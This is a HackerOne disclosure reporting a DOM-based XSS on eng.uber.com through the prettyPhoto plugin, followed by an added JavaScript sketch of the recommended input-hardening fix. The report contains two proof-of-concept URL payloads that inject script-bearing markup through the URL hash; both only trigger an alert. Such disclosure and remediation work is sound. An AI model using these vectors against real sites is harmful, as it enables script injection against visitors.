Uber: Dom Based Xss

ID H1:125498
Type hackerone
Reporter e3xpl0it
Modified 2016-05-09T22:27:41


Hi. Found DOM XSS on this subdomain, eng.uber.com. You are using a vulnerable plugin, prettyPhoto. This XSS will work in Firefox, Google Chrome and the latest version of IE! And this is very dangerous!

POC Firefox vector: http://eng.uber.com/#prettyPhoto[i]/x,<svg/onload=alert(document.domain)>/x

POC Google Chrome and IE: http://eng.uber.com/#prettyPhoto[gallery]/1,<a onclick="alert(document.domain);">/

Add screenshot. How to fix the vulnerability: upgrade the plugin, or add the filter hashIndex = parseInt(hashIndex); hashRel = hashRel.replace(/([ #;&,.+*~\':"!^$=>|\/])/g,'\\$1');
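Added example, not code from the report, from Uber or from the prettyPhoto plugin: a simplified reconstruction of the "#prettyPhoto[rel]/index/" hash parsing with the two recommended hardening steps (parseInt on the index, escaping selector metacharacters in the rel) applied, run over the report's two vectors and a benign hash. The parsing layout (rel between "[" and "]/", index up to the last "/") and the a[rel^="..."] selector shape are assumptions for illustration.

```javascript
// Added example (not prettyPhoto's or Uber's code): a simplified reconstruction
// of the "#prettyPhoto[rel]/index/" hash parsing, with the two hardening steps
// the report recommends applied before anything reaches a jQuery selector.

// Characters the report's filter escapes. The replacement is '\\$1' in source
// (two backslashes) so each captured character gets a literal backslash.
const SELECTOR_META = /([ #;&,.+*~':"!^$=>|\/])/g;

function escapeSelectorPart(s) {
  return s.replace(SELECTOR_META, '\\$1');
}

// Splits a location.hash of the form "#prettyPhoto[rel]/index/" into its parts
// (assumed layout). Returns null when the hash is not a prettyPhoto hash or the
// index is not a whole number, so markup smuggled into the index slot is
// dropped instead of being handed to $() as HTML.
function parsePrettyPhotoHash(hash) {
  if (typeof hash !== 'string' || hash.indexOf('prettyPhoto') === -1) return null;
  const open = hash.indexOf('[');
  const close = hash.indexOf(']/');
  const last = hash.lastIndexOf('/');
  if (open === -1 || close === -1 || last <= close + 1) return null;
  const rawRel = hash.substring(open + 1, close);
  const rawIndex = hash.substring(close + 2, last);
  const index = parseInt(rawIndex, 10); // "1,<a onclick=...>" -> 1, "x,<svg..." -> NaN
  if (!Number.isInteger(index) || index < 0) return null;
  return { rel: escapeSelectorPart(rawRel), index: index };
}

// The only place the (escaped) rel is allowed into a selector string.
function safeSelectorFor(hash) {
  const parsed = parsePrettyPhotoHash(hash);
  return parsed === null ? null : 'a[rel^="' + parsed.rel + '"]';
}

// Constructed sample hashes: a benign one, then the two vectors from the report.
const SAMPLE_HASHES = [
  '#prettyPhoto[gallery]/2/',
  '#prettyPhoto[i]/x,<svg/onload=alert(document.domain)>/x',
  '#prettyPhoto[gallery]/1,<a onclick="alert(document.domain);">/',
];

for (const h of SAMPLE_HASHES) {
  console.log(JSON.stringify(h), '->', JSON.stringify(parsePrettyPhotoHash(h)));
}
```

With the filter in place the Firefox vector is rejected outright (its index is not a number) and the Chrome/IE vector collapses to index 1 with the markup discarded.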